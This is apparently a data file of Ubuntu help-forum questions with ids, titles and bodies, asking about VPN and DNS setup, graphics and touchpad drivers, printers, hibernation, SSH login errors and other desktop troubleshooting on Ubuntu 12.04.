174444	asking for a sstp connecting configuration file for using sstp command line	using sstp with network manager and dnscrypt stopped working on ubuntu 12.04 dnscrypt and network manager and using unblockvpn 's sstp - http : //sourceforge.net/projects/sstp-client/ connects the vpn but dnscrypt stops working . tested with ipv4 settings : a ) automatic ( vpn ) and b ) automatic ( vpn ) addresses only with dns server : 127.0.0.2 network manager and using openvpn - unblockvpn 's configuration 256 bits encryption connects the vpn but navigation and dnscrypt stop working . tested with ipv4 settings : a ) automatic ( vpn ) and b ) automatic ( vpn ) addresses only with dns server : 127.0.0.2 network manager and using openvpn - witopia 's configuration 128 bits encryption connects the vpn and navigation and dnscrypt keep working . working only with ipv4 settings : automatic ( vpn ) addresses only with dns server : 127.0.0.2 network manager and using openvpn - witopia 's configuration 256 bits encryption connects the vpn but only dnscrypt stops working . tested with ipv4 settings : a ) automatic ( vpn ) and b ) automatic ( vpn ) addresses only with dns server : 127.0.0.2 could you please help me with this technical issue ? dnscrypt keeps working in any encryption mode ( 128 and 256 bits ) using openvpn command line , very stable ! i hope that sstp and openvpn could be used with dnscrypt , it would be an extraordinary security tool ! could you please send the unblockvpn 's sstp connecting configuration file using sstp command line in linux and instructions ? i think that using it with command line will let the connection functions correctly instead of using it with network manager .
174450	editor with code completion for sdl	is there a code editor that offers code completion and shows the function prototype for sdl ? i ask for an automatic completion like in notepad++ , that shows functions list after like 3 characters have been entered and then show the prototype of the function when the parentheses are opened . eclipse offer kind-of what i ask , but it requires ctrl+space to activate it .
174453	i am not able to set resolution at 1280 x 1024	i am not able to set my screen size at 1280 x 1024 . when i go to the display settings only the following two screen sizes are available : 1024 x 768 800 x 600 i am using hp lp1965 lcd display screen .
174455	want to make swap file from my ubuntu live ( on flash drive ) to my main hard disk	can any one tell me why the following order gave me unexpected number of arguments ? > > > > > fallocate -l 6g /media/309afd059afcc87c/ubuntu live drive program files/6g.swap
174458	i can ping , dig , but i ca n't browse	i 've searched for 5 days on the internet for a solution to my problem , and i already did almost everything , and i still have no positive results . i installed 12.04 lts in virtualbox . i 'm using bridged mode in the virtualbox network preferences . i use as a router a routerboard 450 , with no proxy , dhcp with static ip to my virtual ubuntu , and i use opendns ips to resolve the host names . i 'm new to the linux world , i 've started this week and i really want to solve this big problem . i do n't want just to leave ubuntu and start with centos or debian , etc . i 've already tried to reinstall ubuntu , i 've disabled selinux , purged network-manager and did the configuration manually . i really do n't remember what more i did . i can ping google , the ip of opendns also , i 've tried to use google dns , i 've changed the resolv.conf . can someone help me ? ** solved , avast firewall was blocking my connection , i 've solved it enabling the ics option **
174460	how do i set my wallpaper to auto-change periodically ?	how can i set wallpaper to change every 5 minutes or so ? the problem is that i already got used to current ones and i want to see new wallpapers . i can search and add new ones of course but it seems too manual to me . are there any services which provide daily fresh wallpapers ? how can i set my system to automatically download and use the new ones ?
174461	amd binary driver fails to initialize graphics card , any ideas ?	i 'm at my wits end - after trying solid for the past week to get a working display driver on my new hand-built machine , i have had zero success . i 've exhausted the forums , trying every possible combination i could find and still have had no luck . can anyone please provide me with some insight ? maybe that one little thing i 'm missing ? here 's the low down : i have a gigabyte radeon hd 7950 video card running on an intel i5 / z77 motherboard with a clean install of ubuntu 12.04 64-bit desktop . verified hardware as working in windows . i have tried installing just about every version of the amd binary driver , as i have read repeatedly that the radeon hd 7000 series cards are not supported by the open source driver . i have tried using the fglrx driver provided by the ubuntu repository , as well as the amd website *.run files of catalyst driver versions from 12.1 to 12.6 . i have also tried compiling the driver and installing exactly as directed by the page what is the correct way to install ati catalyst video drivers ? but i still get the same error , regardless of which driver i use . i have also tried the drivers with the boot argument `` nomodeset '' to no avail . i 'm not 100 % sure which error is really the culprit of the failure in my xorg.0.log , the `` fglrx : no matching device section for instance '' ( note - the hardware @ pci 1:0:1 it is complaining about is the hdmi audio device ! ? ) error , or the `` xf86openconsole : setpgid failed : operation not permitted '' error . you can see the full log , xorg.conf and lsmod , lspci output at the shared google docs folder below . https : //docs.google.com/folder/d/0byswzbhyouqsz1owd3zdvjrxq00/edit any suggestion at all is appreciated ( give up and wait for ubuntu 12.10 ? haha ) . thanks .
174472	how to get intel速 centrino速 wireless-n 2230 to work on 11.10 ?	i recently got an alienware m17x with the default wireless card which is an intel速 centrino速 wireless-n 2230 . i have tried the suggested actions by other earlier card versions with no success . i have internet with windows if needed . any help is appreciated and thanks in advance .
174474	installing canon lbp6000 in ubuntu 12.04	with the release of ubuntu 14.04 , this question may not be relevant any more . this one ( making canon lbp6000 printer work under ubuntu 14.04 64-bit ) might be more helpful . this is really frustrating . i am trying to install lbp6000 in ubuntu 12.04 without any success . ( well , i had success about a week back when i first bought the printer and finally printed pages after a struggle of several hours . then today it suddenly stopped working and i uninstalled everything and started from scratch . now , i seem to have lost the way . ) my steps downloaded the latest canon driver from canon site . file linux_capt_printerdriver_v240_uk_en.tar.gz got the radu script ( http : //radu.cotescu.com/how-to-install-canon-lbp-printers-in-ubuntu/ ) changed the /etc/modprobe.d/blacklist-cups-usblp.conf file as instructed in , official documentation . ( see the section ubuntu 12.04 install ) . now this file looks like , # cups talks to the raw usb devices , so we need to blacklist usblp to avoid # grabbing them # blacklist usblp rebooted my machine changed the port in radu script to 59787 as instructed in the link at step 3 . ( again see the section ubuntu 12.04 install , or see the comment at how to install canon lbp printers in ubuntu . also put the latest deb files from step 1 in the appropriate directory of this script . ran the radu script . a printer , lbp6000 got added . not two printers , one to be disabled , as appeared in the message on the terminal after running the script . sudo /etc/init.d/ccpd status shows , canon printer daemon for cups : ccpd : 3142 3139 results the printer does not print . printer state ( from system setting- > printing , or at cups http interface localhost:631/printers/lbp6000 ) goes from idle to processing , a job appears in print queue , and then the job disappears and the printer state goes back to idle . the actual printer does not even blink . diagnostics ( got help from the link in step 3 , troubleshooting ) captstatusui -p lbp6000 shows communication error lsmod | grep usblp did not show anything . after running , sudo modprobe usblp , shows usblp 17885 0 however , ls -l /dev/usb/lp0 gives , ls : can not access /dev/usb/lp0 : no such file or directory /var/ccpd did not exist , created , sudo mkdir /var/ccpd sudo mkfifo /var/ccpd/fifo0 sudo chown -r lp : lp /var/ccpd any suggestion will be appreciated . do not know what to do .
174478	how do i remove ati video drivers ?	i have a radeon hd4850 video card and two monitors . when i try to activate the drivers from the `` additional drivers '' app , it either fails or it will not let me use two monitors . i downloaded the drivers from the website and once i run , it says that i have to delete previous versions before , or i can use `` force '' which is not recommended . questions : how would i go about uninstalling the drivers if they are not activated ? if it fails at any point how would i revert back ?
174481	resuming hibernate from a swapfile	i am rather sure that i set up hibernation correctly , and that the swap file i am using is being recognized and written to when i click hibernate . ( /hibernate.img ) in the corner of the screen , it says system snapshot , compression ratio , etc . however , when i resume from hibernate , the top left corner reads `` resuming from hibernate.img '' but then the system just freezes . every time . some of the tutorials mentioned using a specially compiled kernel , and i have not done this . the kernel is simply 3.2.0-25-generic . i am using 12.04 64-bit . any help would be great .
174486	how can i make this evhz.c file to run properly ?	i 'm really new at linux . i just installed ubuntu 12.04- i compiled and tried to run a program but it does n't work and i do n't have a clue why . searched on google but no one seems to have a problem with it . it must be a silly error . the program is evhz.c ( link here : http : //web.archive.org/web/20060623094750/http : //homepages.nildram.co.uk/~kial/evhz.c ) . the program verifies the changed you done in the mouse polling rate . i used this guide : https : //wiki.archlinux.org/index.php/mouse_polling_rate i used gcc -o evhz evhz.c to compile it . first i got the error : evhz.c : in function ‘main’ : evhz.c:35:2 : warning : incompatible implicit declaration of built-in function ‘memset’ [ enabled by default ] i added # include string.h , as the guide suggested . then i tried to compile again and it was compiled with no warnings . i used ./evhz to execute it as root . ( the script has executable permissions . ) but nothing is shown on the screen : i only get : : ~/desktop $ ./evhz press ctrl-c to exit . it supposed to show a list of usb devices and their polling rate . any idea why is n't working , suggestions , or alternative programs to evhz ?
174490	ca n't report a bug on for a project on launchpad -- what to do ( e.g . skype wrapper )	i want to report a bug in skype wrapper here but am not able to do it . do i need to be a member to report a bug ? i have a launchpad account and i tried reporting it while logged in but i see no option to do so .
174494	very low volume from headphones and external speakers on hp p7-1235 ( ubuntu 12.04 )	installed 12.04 on a new hp pavilion desktop p7-1235 ( amd a8-5500 apu ) . volume is very low from external speakers and headphones plugged into the front jack . i set the master volume and speaker/headphone volumes to max , but volume is very low . used alsamixer to set everything to max , unmuted , same result .
174495	is there a way to use multiple instances of chromium or firefox ?	i usually have different instances of my web browsers to attend to various types of usages , on windows that means using portable versions of chrome and firefox . the existing portable versions of firefox and chromium for linux are outdated and lack immediate support , compared with the portable apps for windows . i am wondering if there is any way to make the current versions of firefox and chromium provided by ubuntu work as `` portable '' , which by that i mean running as the equivalent of a windows portable app , detached from the default browsers .
174499	dual-monitor with radeon 7970 hd graphics card ?	i 'm trying to setup dual 23 '' dell ultrasharp monitors in 12.04 and have run into a few difficulties . i 'm running a radeon 7970 hd graphics card , and am using the latest catalyst ( 12-6 ) at the moment . unfortunately , my right monitor is the only screen which is correctly configured , and my left monitor is at an extremely low resolution ( 640x480 ) and i 'm having difficulty configuring it . i 've also run into this , which basically says that my graphics card is only `` officially '' supported with catalyst 12-1 . but according to this source , the 7970 hd is not supported . my questions are : what does officially supported mean and should i not be using the latest catalyst ( 12-6 ) ? has anyone run into this problem before with a radeon 7970 hd card attempting a dual monitor setup ? what are your solutions if any ? at the moment , it hangs on boot saying : '' stopping system v runlevel compatability '' i did in fact edit my xorg.conf file for dual monitors . the one that 's autogenerated was not working whatsoever . when i revert to the autogenerated configuration file it boots fine , but then dual monitors stop working ( one of the monitors is at a really low resolution and is a mirroring the upper-left corner of the other one ) . i 'm totally at a loss . i 'd really love to get this working and i 've spend nearly a week installing and un-installing different drivers and versions of catalyst . any info about this would be greatly appreciated .
174505	sun broadband wireless and ubuntu	good day ! i recently installed 12.04 . i am having a hard time connecting to the internet using my sun broadband wireless . i installed the 64-bit version . i am from the philippines . when i plug in my usb stick , it does not show up on the network manager/ no new connection can be detected . i try to edit it using edit connections but still to no avail . i have tried doing these steps from kenji08 , kartonista , and from review-ninja ( for this one , i ca n't seem to get pass the first step . ) i hope those information can help .
174506	ubuntu will not load , any method that i try	i tried windows installer , did not work . usb drive , did not work . livelinuxusb , nothing . cd-rom , i got somewhere with this actually . by using the other three methods above , a colorful screen would appear . no , it is n't the ubuntu screen itself , it 's green , blue , all sorts of colors . at first , i load it via cd , the ubuntu screen does come up , it 's purple colored with a few symbols at the bottom . the _ comes up as usual , then the colorful screen comes up , and then after that , it goes to saying vga cable is not plugged in . i know it 's plugged in because i can see windows 7 just perfectly .
174508	is there any way i can run quickly applications from source on other distributions without installing a deb package ?	is there any way i can run quickly applications from source on other distributions without installing deb package . what i need is to run/develop in non-debian based distributions .
174509	connection failed to open the db connection : could not find driver	i am newbie for ubuntu and i was trying to run lamp . i installed mysql , and pdo extensions . when i show config ( with phpinfo ( ) ) : configuration file ( php.ini ) path : /etc/php5/apache2 also i see mysql and pdo_mysql tables in config table . locate pdo_mysql.so giving : /usr/lib/php5/20090626+lfs/pdo_mysql.so locate mysql.so giving : /usr/lib/perl5/auto/dbd/mysql/mysql.so /usr/lib/php5/20090626+lfs/mysql.so /usr/lib/php5/20090626+lfs/pdo_mysql.so /usr/lib/pyshared/python2.7/_mysql.so /usr/lib/python2.7/dist-packages/_mysql.so in php ini file i enabled like that : extension=/usr/lib/php5/20090626+lfs/mysql.so extension=/usr/lib/php5/20090626+lfs/pdo_mysql.so but it does not help then i enabled extension=mysql.so extension=pdo_mysql.so still the same , no result , after any changes i am restarting apache2 with service apache2 restart but still php can not locate pdo for opening connection . so how can i get it work ? thanks .
174516	how do i go back to original 12.04 kernel ?	i wanted to make a custom iso , so i spent the whole day setting up a partition with all the applications and little tweaks that i thought would be comfortable for 12.04 32-bit . i 'm using remastersys to do so , and when i went to do so , it said everything went fine , but when i checked under /etc/remastersys , i could n't find it . maybe i 'm looking in the wrong place ? anyways , i saw in an article that remastersys does n't support the linux kernel from after the original 12.04 release . how do i return my kernel to the original version it was in the default 12.04 without having to reinstall the partition and all the applications all over again ?
174520	how do i get the touchpad working on a dell vostro 3460 ?	the scroll function of this touchpad does not work with ubuntu 11.10 , 12.04 nor 12.10 ( 3.5.0-9-generic ) . xinput shows a ps/2 generic mouse . the pointer function works well , though i can not disable while typing . any hint on how to enable multi-gesture or just the side scroll on this machine ?
174521	how do i get the webcam working on a dell vostro 3460 ?	the webcam is properly detected on ubuntu 12.10 , but i can not make it work with google talk 3.2.4 ... no problem with skype though . xinput shows a laptop_integrated_webcam_e4hd .
174526	how to close windows ( and applications ) by middle-click	while browsing the web , i always close tabs using the middle-click and i 'm wondering , would it be possible to close applications and windows by middle-click ( example : by clicking on the title bar ) ? also , would it works in gnome 3 ? ( note that in the gnome advanced settings there is no close option for the middle-click )
174529	which of two video drivers am i using ?	i am trying to figure out if my integrated intel graphics are being used rather than my discrete geforceeforce 210m . when i check `` additional drivers '' under settings , it does not show any proprietary drivers to be installed indicating that the system does n't even detect the nvidia driver . however , runningsudo lshw -c video gives me the result : *-display description : vga compatible controller product : gt218 [ geforce g210m ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a2 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nouveau latency=0 resources : irq:16 memory : fd000000-fdffffff memory : e0000000-efffffff memory : fa000000-fbffffff ioport : dc00 ( size=128 ) memory : fe980000-fe9fffff *-display description : display controller product : mobile 4 series chipset integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 07 width : 64 bits clock : 33mhz capabilities : msi pm bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:46 memory : fcc00000-fcffffff memory : d0000000-dfffffff ioport : cc00 ( size=8 ) but it does n't tell me which of the two is currently being used ... so how can i figure this out ? notes : i am on ubuntu 12.04 i have not installed any video drivers manually yet . i have no xorg.conf ( i do n't know if this helps or is important , just stating it ) the hybrid graphics works fine on my windows 7 partition .
174538	touchpad problem in 12.04	i have installed 12.04 alongside windows 7 on my dell xps 15z . the model came with a cypress trackpad for windows 7 . after installing ubuntu , i realized the trackpad was not working at all . i tried installing synaptics touchpad in windows , still it did n't work in ubuntu . i searched on the net for similar problems but neither of them worked for me . here 's what i did : edit the rc.local file to add the following lines in the file : sudo modprobe -r psmouse sudo modprobe psmouse proto-imps [ also tried proto-bare , proto-exps ] tried to uncheck `` disable touchpad while typing '' under mouse settings , but i could see no touchpad tab under that . the command xinput list showed no touchpad . so maybe the problem is that touchpad is not detected at all ? please guide me through this problem . i am a first time ubuntu user and do n't have much knowledge about it . are there any specific ubuntu drivers for making touchpad work ?
174539	how do i follow these `` makefile '' instructions ?	i am a beginner of linux . i do n't know to handle the following instructions , please teach me in details . the instructions are below : go to the mmed-release-0.1/src/ . modify the makefile to set appropriate paths for vlfeat , cplex , gsl cblas . to compile , type : make compiled mex files are put in ./bin/ compile libsvm by going to the source directory and type : make open matlab , change directory to : ./src/ . change the paths to hmmall and libsvm , and run : m_setup matlab might complain about name conflict of assert . this is the problem of kevin murphyâs hmm . just ignore it .
174540	understanding apt source code	i want to analyze the apt source code . i have downloaded it and also installed a source code browser for gedit . but still i have no clue where to begin . i have only read `` sl '' 's source code before . i want to mainly study the part where , the software reads the control file of the deb package , and makes an n'ary tree of the dependencies . if some one has already read the apt source code please help me with where to begin . and also if someone can guide me on some kind of tutorial on how to read source code that would be great .
174552	how can i set ask ubuntu website as desktop live wallpaper ?	i want to use ask ubuntu or omg ! ubuntu website as live desktop wallpaper . i want to see the live updates of any of the selected site as my desktop wallpaper , so that i can see the updates regularly on my desktop no need of browser to open . i do n't want any other application like screenlet . it 's a different way like widgets . i want website to be integrated as desktop wallpaper though it may not be interacted but can display live updates . i want website to show updates as i see in the browser even though i wo n't interact with them . but the website should be displayed as active wallpaper . i remember i used to set a website as active desktop background in windows 98 and xp . is there any way to set a website as desktop live background ?
174553	is there a way to set up a vpn server without root access ?	i need to set up a vpn server , but i have only non-root shell access . i 've tried using pptpd with slirp but could not get it working . is there any other way ? right now , i have socks access , but need udp working as well . thanks .
174557	what to do after installing 12.04 lts via wubi ?	i just installed ubuntu via wubi and i have a few questions : how would i know if my video card 's driver is installed and if not , how do i install it ? i have nvidia gt220 1gb . i do n't see proprietary drivers in the system settings . how do i install all codecs in ubuntu ? something like k-lite codec pack or cccp for matroska ? how do i make ubuntu look like windows ? i do n't like the launcher on the side .
174561	wireless wo n't connect properly , keeps asking for a network key	i have double and triple checked my network key and it is correct but i just ca n't connect to my wireless network . i was having troubles with my wireless driver but found a solution for that on here , now i 'm hoping someone can help me with this !
174562	how to do a octal dump of files in my directories ?	i 'm reading unix programming enviromnent . i came across the od command . it essentially works for the file contents but not for the directories . when i do the following command : od -c . i get an error message like this : od : . : read error : is a directory 0000000 why i get this error ? i 'm very new to the ubuntu world . thanks in advance .
174563	how do i modify the session such that closing chromium logs out of the session ?	i 'm creating my own fake chromium os session in ubuntu 12.04 . however i do n't really know how to make it so that when i close chromium , it automatically logs out on it 's own . has anyone got any suggestions ?
174571	grub background messed after installing a new graphics card	i had a nvidia geforce 6200 128mb agp vga card before and ubuntu was working fine and i had customized my grub boot menu background , today i installed a new graphics card which is same as above but it is 256mb , now the graphics of the grub menu is lowered ( low resolution and color depth ) , what should i do to fix it ?
174573	system changing display configuration on its own account - from dual monitor to mirror	my machine is a 13 '' notebook connected to a 22 '' external monitor . using amd cc i set it up so that the notebook screen is my primary monitor and the 22 '' my secondary . if i am planning to watch a movie or the like i sometimes switch my notebook screen off by rotating through the available display configurations fn+f3 . that works fine but as soon as i restart my pc the dual monitor setup i configured disappears and in its place i get a mirrored setup . rotating through the configuration option does n't help . as a result , each time i turn off either of the screens , i have to reconfigure the dual monitor setup on next system start . that was n't the case before with ubuntu natty . how can i solve this problem ? thank you very much in advance .
174578	how to merge folders with different letter cases into one ?	nautilus does n't merge folders with the same name if one of them has uppercase letters and the other does n't ; if one is called `` folder '' and the other is called `` folder '' then nautilus would n't merge them . i have a large amount of files that i need to merge , is there a script that would allow nautilus to mass merge them all ? if not , is there another way than manually renaming all the folders ?
174579	how do i use zram ?	i installed zram as described on webupd8.org . i installed it from the terminal . is that all i have to do or do i have to do some configuration or something ? does the zram-enabler do everything by itself or do i have to set some parameters ?
174581	is there any way to boot windows 7 partition in virtual machine ?	i have a dual boot machine with windows 7 and ubuntu 12.04 lts . some time i need windows 7 during my work . for that i reboot to windows . it 's not a way that i wo n't access ntfs partition . i need my windows 7 environment sometime . is it possible to boot my windows 7 partition in virtual machine in ubuntu 12.04 lts ? that would break me from rebooting . i had heard about xen and kvm virtual system but do n't know how to use . any help to use windows 7 partition on hard disk to boot in virtual box ?
174583	a possible java problem causing a java program to not work ?	i think i installed java correctly from oracle , but i 'm not too sure . but i 'm fairly confident , since when i use java -version i get this : so , i 'm running minecraft with wine . i did n't know how else to launch it and opensdk did n't do the trick either . surprisingly , the start screen actually works and is functional . so , it 's all cool . but when running the game , as expected , i get this : nothing . black . absolutely nothing . so , my skilled peers - can you help me ? ! in case you 're wondering , when running , it comes up in the unity dock-thing . i 'm also running precise 12.04 . also , it 's in .jar format . thanks in advance !
174588	why ca n't i click the button to add a new user ?	i want to ask you something . i tried to create a new user account on ubuntu 12.04 , but , when i am in the `` user accounts '' window and i go left-down ( where the `` + '' sign is ) , i ca n't click on it . it 's not click-able .
174593	why does battery power drain quicker in ubuntu compared to windows in dell inspiron ?	when i used windows 7 with dell inspiron , i got a battery life of 2 hours . but ever since i installed ubuntu , the battery life has taken a hit . when i recharge the battery to almost full and then unplug it from power socket , the battery shows 1:42 hours . but within a minute , this drops down to 0:41 . i even installed powertop 1.97 to combat this , but only configurations i can do in powertop is within tunables , which is shown in the figure . i heard that powertop almost increases battery capacity by double . so , what should i do ?
174594	server : upgrade to quantal - wrong linux kernel ?	i did an do-release-upgrade -d of a headless ubuntu server to quantal over ssh . it has installed the linux-image-3.5 package however when i look at uname i still get 3.0 : $ uname -a linux xxx 3.0.0-12-server # 20-ubuntu smp fri oct 7 16:36:30 utc 2011 x86_64 x86_64 x86_64 gnu/linux the installed packages with linux in the name are : $ dpkg -l | grep linux ii libselinux1 : amd64 2.1.9-5ubuntu1 amd64 selinux runtime shared libraries ii libselinux1-dev 2.1.9-5ubuntu1 amd64 selinux development headers ii linux-firmware 1.88 all firmware for linux kernel drivers ii linux-image-3.0.0-12-server 3.0.0-12.20 amd64 linux kernel image for version 3.0.0 on x86_64 rc linux-image-3.0.0-14-server 3.0.0-14.23 amd64 linux kernel image for version 3.0.0 on x86_64 rc linux-image-3.0.0-15-server 3.0.0-15.26 amd64 linux kernel image for version 3.0.0 on x86_64 rc linux-image-3.0.0-16-server 3.0.0-16.29 amd64 linux kernel image for version 3.0.0 on x86_64 ii linux-image-3.2.0-18-generic 3.2.0-18.29 amd64 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-27-generic 3.2.0-27.43 amd64 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.5.0-8-generic 3.5.0-8.8 amd64 linux kernel image for version 3.5.0 on 64 bit x86 smp ii linux-image-3.5.0-9-generic 3.5.0-9.9 amd64 linux kernel image for version 3.5.0 on 64 bit x86 smp ii linux-image-extra-3.5.0-8-generic 3.5.0-8.8 amd64 linux kernel image for version 3.5.0 on 64 bit x86 smp ii linux-image-extra-3.5.0-9-generic 3.5.0-9.9 amd64 linux kernel image for version 3.5.0 on 64 bit x86 smp ii linux-image-generic 3.5.0.9.9 amd64 generic linux kernel image ii linux-image-server 3.5.0.9.9 amd64 transitional package . ii linux-libc-dev : amd64 3.5.0-9.9 amd64 linux kernel headers for development ii util-linux 2.20.1-5.1ubuntu1 amd64 miscellaneous system utilities how does it select which kernel to open at boot time ? is 3.0.0-12-server the correct kernel for a quantal server ?
174596	terminal emulator left-click to open link	so i 've been trying to get back to using linux as my primary os . i 'm running ubuntu 12.04 with gnome 3 . i 've tried multiple terminal emulators , but they all seem to have a common failing : you need to hold the ctrl key down while left clicking to open links in a browser , or right click and select the context menu option `` open link '' . this is sub-optimal for me . the machine i 'm using as a linux desktop environment is the laptop i use for work . i use this when i 'm working from home and i 'm in my bedroom as opposed to my office ; in my office i have my windows gaming rig and my local linux server ( which i usually access over ssh from the laptop or the gaming rig , and run tmux inside ) . i often use this when my wife is sleeping and i do n't have the space to use an external mouse . i know that 's a lot of extra details ( bordering on off-topic ) , but i 'm trying to give a clearer picture of the reasoning behind my use case , and rule out certain solutions that wo n't work . right clicking and selecting open link and even holding the ctrl button down are easier when i can use the external mouse , but when i 'm using the track pad , it 's really uncomfortable to do so . part of why i work from home and use the laptop in bed is because i have chronic pain conditions , so finding a way to customize my environment for my comfort is important to me , to help manage my disabilities . i 've tried gnome-terminal , terminator , guake , and several others that i ca n't remember at the moment . rxvt does n't even seem to recognize links ( in regular or unicode versions ) , same for xterm . unicode also seems to be important so that tmux draws correctly ( there might be config tweaks to work around that , but that 's just what i noticed when testing now ) . any suggestions for how to configure one of the popular emulators to work with this , or another emulator to try ? i 've been using guake lately since it seemed the best of them , but i 'm definitely open to switching if it gets the job done . i would prefer not to hand-patch code , as i prefer to manage everything through apt if possible , but i will if it 's necessary . i 've avoided kde-specific apps so far because of the extra overhead to get a single kde app to run inside gnome , but if there are no alternatives and it performs well enough , that 's worth exploring as well . i 'm sorry if this seems like a trivial concern to folks , but this is actually the single-most annoying thing i 'm dealing with trying to use linux as a desktop environment ( which in my opinion says a lot of good things about the state of the linux desktop ) . however , with my disability , i 'm getting tempted to set my default boot back to windows as a result . i got very used to using putty-url which handles this perfectly . thanks for your help .
174603	how to connect to wired connection from the terminal	i corrupted my xorg while experimenting on my system so i had to forcibly drop to command line . however , my question is this - how do i connect to wired connection from the command line ? ?
174610	how do i resize a wubi partition ( ubuntu installed by windows ) ?	i wanted to add more space to the ubuntu partition , but only two partitions appear , /dev/sda1 is 100mb of what i assume is boot data , and /dev/sda2 is the /host directory , which has all the windows files on it . i suspect ubuntu is running in the windows files somewhere . i have had banshee and skype both error messaging , and i have been unable to install anything without removing files , so clearly the issue is urgent . all i want is to allocate about 30gb of space to ubuntu . any help much appreciated .
174619	is it possible to update vuze 4.3 to 4.7 ?	i have been wondering how to update vuze 4.3 i noticed it in the ubuntu software that it only has 4.3 and been researching on how to get the latest installments.. if you could help on a step by step if it is possible to update vuze to it 's latest version , much would be appreciated , thanks
174624	how does magazine publishing work on the ubuntu software center ?	i 'm looking into publishing a magazine on the ubuntu software center , how would i go about doing that ? i notice there are a lot of them , but i 'm not sure how it works . thanks .
174626	how do i burn a dvd iso using the terminal ?	i have a dvd iso file and i want to burn through the terminal . we have many command formats but i am unable to choose the best & safe one . so please give me a best command to burn the iso through the terminal .
174627	how to change audio input to output ?	i have one audio output and two audio inputs on my computer . but , i have one microphone , stereo reproductors and headphones . in windows realtek driver , i could simple change the audio input to output , now i 'm using ubuntu 12.04 and pulseaudio . is there any option to change the input to output and conversely ? thanks
174628	stuck on black pixelated screen while trying to install 12.04	i put ubuntu onto a dvd after downloading it from the website . when i boot from the dvd i can select try ubuntu , install , or check for disc errors ( something like that ) . i select install but then a black screen with a blue line , a yellow line , and a bunch of white line show up . this also happened when i installed with wubi . with wubi i was able to get ubuntu on the system , but when i tried to run ubuntu/boot it , i would get a puple and black screen with pixels . what should i do ?
174631	how can i prevent android emulator from crashing my laptop ?	i have tried experimenting with a few variables ( starting from within/outside eclipse , different sdk versions , different screen resolutions ) and ca n't find a consistent reason that the android emulator is crashing on my laptop running ubuntu 11.10 . when it does , it shuts down my machine . is there anything i can do to sandbox the emulator process so that if it does crash , it does n't take everything else with it ?
174633	gnome-keyring-daemon [ 16231 ] : unsupported key algorithm in certificate : 1.2.840.10045.2.1	ok ... so when i try to ssh into my hosting service 's shell account , i can not login . the problem seems to be the gnome keyring service not having a supported key algorithm , but i 'm clueless as to how to fix this and i 'm wasting way too much time googling for answers that nobody seems to have . one site said that installing the libpam-unix2 package should fix the problem , but it did n't fix anything for me . hopefully someone here has a clue . here 's what 's happening ( i 'm using ubuntu 12.04 ) ... . $ rm -r .ssh $ ssh -v # # # . # # # . # # # . # # # openssh_5.9p1 debian-5ubuntu1 , openssl 1.0.1 14 mar 2012 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config line 19 : applying options for * debug1 : connecting to # # # . # # # . # # # . # # # [ # # # . # # # . # # # . # # # ] port 22. debug1 : connection established . debug1 : selinux support disabled debug1 : identity file /home/forrest/.ssh/id_rsa type -1 debug1 : identity file /home/forrest/.ssh/id_rsa-cert type -1 debug1 : identity file /home/forrest/.ssh/id_dsa type -1 debug1 : identity file /home/forrest/.ssh/id_dsa-cert type -1 debug1 : identity file /home/forrest/.ssh/id_ecdsa type -1 debug1 : identity file /home/forrest/.ssh/id_ecdsa-cert type -1 debug1 : remote protocol version 2.0 , remote software version openssh_5.3 debug1 : match : openssh_5.3 pat openssh* debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_5.9p1 debian-5ubuntu1 debug1 : ssh2_msg_kexinit sent debug1 : ssh2_msg_kexinit received debug1 : kex : server- > client aes128-ctr hmac-md5 none debug1 : kex : client- > server aes128-ctr hmac-md5 none debug1 : ssh2_msg_kex_dh_gex_request ( 1024 < 1024 < 8192 ) sent debug1 : expecting ssh2_msg_kex_dh_gex_group debug1 : ssh2_msg_kex_dh_gex_init sent debug1 : expecting ssh2_msg_kex_dh_gex_reply debug1 : server host key : rsa f4 : a8 : f7:88:56 : bd:6e:87:73:3d:45:12:8d : c2 : eb : c0 the authenticity of host ' # # # . # # # . # # # . # # # ( # # # . # # # . # # # . # # # ) ' ca n't be established . rsa key fingerprint is f4 : a8 : f7:88:56 : bd:6e:87:73:3d:45:12:8d : c2 : eb : c0 . are you sure you want to continue connecting ( yes/no ) ? yes warning : permanently added ' # # # . # # # . # # # . # # # ' ( rsa ) to the list of known hosts . debug1 : ssh_rsa_verify : signature correct debug1 : ssh2_msg_newkeys sent debug1 : expecting ssh2_msg_newkeys debug1 : ssh2_msg_newkeys received debug1 : roaming not allowed by server debug1 : ssh2_msg_service_request sent debug1 : ssh2_msg_service_accept received debug1 : authentications that can continue : publickey , password debug1 : next authentication method : publickey debug1 : trying private key : /home/forrest/.ssh/id_rsa debug1 : trying private key : /home/forrest/.ssh/id_dsa debug1 : trying private key : /home/forrest/.ssh/id_ecdsa debug1 : next authentication method : password forrest @ # # # . # # # . # # # . # # # 's password : debug1 : authentications that can continue : publickey , password permission denied , please try again . forrest @ # # # . # # # . # # # . # # # 's password : debug1 : authentications that can continue : publickey , password permission denied , please try again . forrest @ # # # . # # # . # # # . # # # 's password : debug1 : authentications that can continue : publickey , password debug1 : no more authentication methods to try . permission denied ( publickey , password ) . the relevant bit in /var/logs/auth.log says -- aug 11 09:01:17 pompano gnome-keyring-daemon [ 16231 ] : unsupported key algorithm in certificate : 1.2.840.10045.2.1 aug 11 09:02:33 gnome-keyring-daemon [ 16231 ] : last message repeated 4 times so apparently the gnome keyring no longer has the supported key algorithm for ssh ? huh ?
174636	installing from local dependencies ?	i have a folder with all dependencies needed for my program ( gimp ) in a folder . i do n't have internet connection on that system . how can i install gimp dependencies from that folder . note : all dependencies are in same folder as gimp.deb . but every time i try to dpk -i gimp.deb it throws me some error on dependencies not met . how can i tell the dpkg to search for dependencies in my own folder .
174646	how do i find my firewall is blocking mysql ?	i 'm very new to ubuntu . i could n't able to connect to mysql via my programming language . i know all my property file in my code is correct . but still i could n't able to connect to mysql . i guess my firewall is blocking me out . i have ufw firewall installed , how do i enable 3306 port in that ? i tried these steps but does n't get the solution . thanks in advance .
